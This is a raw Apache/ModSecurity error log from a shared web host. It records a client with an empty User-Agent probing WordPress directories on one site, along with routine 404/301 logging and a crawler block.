[Tue May 26 17:03:39.836064 2026] [security2:error] [pid 851641:tid 851890] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/akismet/"] [unique_id "ahWFExp8QSN2510avp4lXAAAAHc"]
[Tue May 26 17:03:40.267813 2026] [security2:error] [pid 851641:tid 851803] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFFBp8QSN2510avp4lcAAAACA"]
[Tue May 26 17:03:40.375789 2026] [autoindex:error] [pid 851641:tid 851841] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/assets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:40.376459 2026] [security2:error] [pid 851641:tid 851841] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFBp8QSN2510avp4lcwAAAEY"]
[Tue May 26 17:03:40.376853 2026] [security2:error] [pid 851641:tid 851778] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/assets/"] [unique_id "ahWFFBp8QSN2510avp4lcQAAAAc"]
[Tue May 26 17:03:40.633102 2026] [security2:error] [pid 851641:tid 851784] [client 69.58.72.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFFBp8QSN2510avp4lfQAAAA0"], referer: https://www.anujtradingco.com/
[Tue May 26 17:03:40.718046 2026] [autoindex:error] [pid 851641:tid 851776] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:40.718803 2026] [security2:error] [pid 851641:tid 851776] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFBp8QSN2510avp4lgAAAAAU"]
[Tue May 26 17:03:40.719155 2026] [security2:error] [pid 851641:tid 851863] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/block-patterns/"] [unique_id "ahWFFBp8QSN2510avp4lfgAAAFw"]
[Tue May 26 17:03:41.001703 2026] [autoindex:error] [pid 851641:tid 851791] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:41.002361 2026] [security2:error] [pid 851641:tid 851791] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFBp8QSN2510avp4lkQAAABQ"]
[Tue May 26 17:03:41.003050 2026] [security2:error] [pid 851641:tid 851877] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/block-supports/"] [unique_id "ahWFFBp8QSN2510avp4ljwAAAGo"]
[Tue May 26 17:03:41.187047 2026] [autoindex:error] [pid 851641:tid 851896] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/html-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:41.187723 2026] [security2:error] [pid 851641:tid 851896] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFRp8QSN2510avp4llwAAAH0"]
[Tue May 26 17:03:41.188130 2026] [security2:error] [pid 851641:tid 851833] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/html-api/"] [unique_id "ahWFFRp8QSN2510avp4llQAAAD4"]
[Tue May 26 17:03:41.327738 2026] [security2:error] [pid 851641:tid 851815] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFFBp8QSN2510avp4ljgAAACw"]
[Tue May 26 17:03:41.480414 2026] [autoindex:error] [pid 851641:tid 851797] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:41.481391 2026] [security2:error] [pid 851641:tid 851797] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFRp8QSN2510avp4loAAAABo"]
[Tue May 26 17:03:41.489868 2026] [security2:error] [pid 851641:tid 851843] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/js/"] [unique_id "ahWFFRp8QSN2510avp4lngAAAEg"]
[Tue May 26 17:03:41.693876 2026] [autoindex:error] [pid 851641:tid 851862] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/php-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:41.694991 2026] [security2:error] [pid 851641:tid 851862] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFRp8QSN2510avp4lqwAAAFs"]
[Tue May 26 17:03:41.695410 2026] [security2:error] [pid 851641:tid 851828] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/php-compat/"] [unique_id "ahWFFRp8QSN2510avp4lqQAAADk"]
[Tue May 26 17:03:42.111759 2026] [autoindex:error] [pid 851641:tid 851846] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:42.112475 2026] [security2:error] [pid 851641:tid 851846] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFhp8QSN2510avp4luAAAAEs"]
[Tue May 26 17:03:42.130510 2026] [security2:error] [pid 851641:tid 851865] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/PHPMailer/"] [unique_id "ahWFFhp8QSN2510avp4ltgAAAF4"]
[Tue May 26 17:03:42.384926 2026] [autoindex:error] [pid 851641:tid 851806] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:42.385671 2026] [security2:error] [pid 851641:tid 851806] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFhp8QSN2510avp4lxQAAACM"]
[Tue May 26 17:03:42.386013 2026] [security2:error] [pid 851641:tid 851874] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/pomo/"] [unique_id "ahWFFhp8QSN2510avp4lwgAAAGc"]
[Tue May 26 17:03:42.701999 2026] [security2:error] [pid 851641:tid 851844] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFFhp8QSN2510avp4lwQAAAEk"], referer: http://preetishah.com/dist/manifest.json
[Tue May 26 17:03:42.844779 2026] [security2:error] [pid 851641:tid 851826] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFFhp8QSN2510avp4lygAAADc"]
[Tue May 26 17:03:43.107496 2026] [security2:error] [pid 851641:tid 851851] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFFhp8QSN2510avp4l1AAAAFA"]
[Tue May 26 17:03:43.107519 2026] [security2:error] [pid 851641:tid 851851] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFFhp8QSN2510avp4l1AAAAFA"]
[Tue May 26 17:03:43.108011 2026] [security2:error] [pid 851641:tid 851837] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-includes/random_compat/"] [unique_id "ahWFFhp8QSN2510avp4l0gAAAEI"]
[Tue May 26 17:03:43.282917 2026] [security2:error] [pid 851641:tid 851789] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFFxp8QSN2510avp4l1QAAABI"]
[Tue May 26 17:03:43.379671 2026] [autoindex:error] [pid 851641:tid 851862] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:43.380305 2026] [security2:error] [pid 851641:tid 851862] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFxp8QSN2510avp4l4gAAAFs"]
[Tue May 26 17:03:43.380717 2026] [security2:error] [pid 851641:tid 851813] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/rest-api/"] [unique_id "ahWFFxp8QSN2510avp4l4AAAACo"]
[Tue May 26 17:03:43.408757 2026] [security2:error] [pid 851641:tid 851838] [client 114.119.148.60:43801] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousfafe/ebdbaf2049896.shtml"] [unique_id "ahWFFxp8QSN2510avp4l4wAAAEM"], referer: http://ghanemgh.com/prespontaneousfafe/ebdbaf2049896.shtml
[Tue May 26 17:03:43.606778 2026] [autoindex:error] [pid 851641:tid 851780] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:43.607499 2026] [security2:error] [pid 851641:tid 851780] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFxp8QSN2510avp4l6QAAAAk"]
[Tue May 26 17:03:43.617390 2026] [security2:error] [pid 851641:tid 851891] [client 69.58.72.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFFxp8QSN2510avp4l5gAAAHg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1265867&moderation-hash=e519caa89df2a19c114b9626ea3b3ea7
[Tue May 26 17:03:43.618684 2026] [security2:error] [pid 851641:tid 851890] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/sitemaps/"] [unique_id "ahWFFxp8QSN2510avp4l5wAAAHc"]
[Tue May 26 17:03:43.804286 2026] [autoindex:error] [pid 851641:tid 851893] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:43.805007 2026] [security2:error] [pid 851641:tid 851893] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFFxp8QSN2510avp4l9QAAAHo"]
[Tue May 26 17:03:43.805407 2026] [security2:error] [pid 851641:tid 851830] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/sodium_compat/"] [unique_id "ahWFFxp8QSN2510avp4l8wAAADs"]
[Tue May 26 17:03:44.091640 2026] [autoindex:error] [pid 851641:tid 851773] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/style-engine/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:44.092497 2026] [security2:error] [pid 851641:tid 851773] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFGBp8QSN2510avp4l_AAAAAI"]
[Tue May 26 17:03:44.092876 2026] [security2:error] [pid 851641:tid 851871] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/style-engine/"] [unique_id "ahWFGBp8QSN2510avp4l-gAAAGQ"]
[Tue May 26 17:03:44.678480 2026] [security2:error] [pid 851641:tid 851784] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFGBp8QSN2510avp4mAAAAAA0"], referer: http://preetishah.com/dist/.vite/manifest.json
[Tue May 26 17:03:44.682135 2026] [autoindex:error] [pid 851641:tid 851872] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/theme-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:44.682832 2026] [security2:error] [pid 851641:tid 851872] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFGBp8QSN2510avp4mEQAAAGU"]
[Tue May 26 17:03:44.703038 2026] [security2:error] [pid 851641:tid 851877] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/theme-compat/"] [unique_id "ahWFGBp8QSN2510avp4mDwAAAGo"]
[Tue May 26 17:03:44.888214 2026] [autoindex:error] [pid 851641:tid 851781] [client 138.199.19.160:0] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:44.888875 2026] [security2:error] [pid 851641:tid 851781] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFGBp8QSN2510avp4mFwAAAAo"]
[Tue May 26 17:03:44.889225 2026] [security2:error] [pid 851641:tid 851832] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/wp-includes/widgets/"] [unique_id "ahWFGBp8QSN2510avp4mFQAAAD0"]
[Tue May 26 17:03:45.251912 2026] [autoindex:error] [pid 851641:tid 851838] [client 138.199.19.160:45290] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:45.252632 2026] [security2:error] [pid 851641:tid 851838] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFGRp8QSN2510avp4mHgAAAEM"]
[Tue May 26 17:03:45.547376 2026] [autoindex:error] [pid 851641:tid 851839] [client 138.199.19.160:45290] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:45.548148 2026] [security2:error] [pid 851641:tid 851839] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFGRp8QSN2510avp4mKgAAAEQ"]
[Tue May 26 17:03:45.574164 2026] [security2:error] [pid 851641:tid 851892] [client 5.255.99.53:57282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFGRp8QSN2510avp4mJQAAAHk"]
[Tue May 26 17:03:46.001358 2026] [security2:error] [pid 851641:tid 851779] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFGRp8QSN2510avp4mOwAAAAg"]
[Tue May 26 17:03:46.001391 2026] [security2:error] [pid 851641:tid 851779] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFGRp8QSN2510avp4mOwAAAAg"]
[Tue May 26 17:03:46.001898 2026] [security2:error] [pid 851641:tid 851865] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/admin/images/slider/"] [unique_id "ahWFGRp8QSN2510avp4mOQAAAF4"]
[Tue May 26 17:03:46.335054 2026] [security2:error] [pid 851641:tid 851803] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFGRp8QSN2510avp4mPgAAACA"]
[Tue May 26 17:03:46.508531 2026] [security2:error] [pid 851641:tid 851814] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFGhp8QSN2510avp4mTgAAACs"]
[Tue May 26 17:03:46.508555 2026] [security2:error] [pid 851641:tid 851814] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFGhp8QSN2510avp4mTgAAACs"]
